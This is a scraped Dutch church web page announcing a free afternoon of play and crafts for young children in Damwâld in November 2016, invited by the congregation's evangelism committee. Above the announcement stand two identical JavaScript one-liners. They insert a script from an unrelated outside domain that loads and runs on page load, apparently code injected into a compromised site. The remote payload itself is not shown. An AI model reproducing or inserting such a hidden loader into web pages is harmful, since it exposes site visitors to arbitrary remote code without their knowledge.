;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kinderactiviteit in 't Skûlplak voor de groepen 1 t /m 4 - PKN Damwâld
16 november 2016
14:00 t/m 16:00
't Skûlplak
Kinderactiviteit in ’t Skûlplak voor de groepen 1 t /m 4Een Stééngoed plan !

Wij kennen allemaal de tekst uit Mattheüs 28:19 ; gaat dan heen en maak alle volken tot Mijn discipelen…… Als navolgers van Christus hebben we allemaal die opdracht gekregen.
Maar wat valt het tegen om dit in de praktijk te brengen. Het is net of niemand op dit Goede nieuws zit te wachten. En neemt u wel eens iemand die God niet- of nauwelijks kent mee naar de kerk? Het gebeurd jammer genoeg zeer weinig. Als Evangelisatiecommissie willen u hierbij helpen !
Daarom organiseren wij op woensdag 16 november van 14.00 tot 16.00 uur een kinderactiviteit in het Skûlplak voor de groepen 1 t /m 4 .
Thema van deze spelmiddag is :  Een Stééngoed plan !
De opdracht die we de ouders van kinderen uit die leeftijdsgroep willen meegeven is : vraag vriendjes en vriendinnetjes van uw kinderen om samen met hen mee te doen aan de kindermiddag en wij zorgen voor een onvergetelijke uurtjes waarin verteld word wat het thema betekent, knutselen en een spel.
Wij hebben er zin in, jullie ook ?
Fijn, en vergeet niet om je vriendjes en vriendinnetjes mee te nemen!
Je hoeft niet te betalen en voor drinken en wat lekkers wordt gezorgd.

Locatie: 't SkûlplakBûterblom 8, 9104 JE Damwâld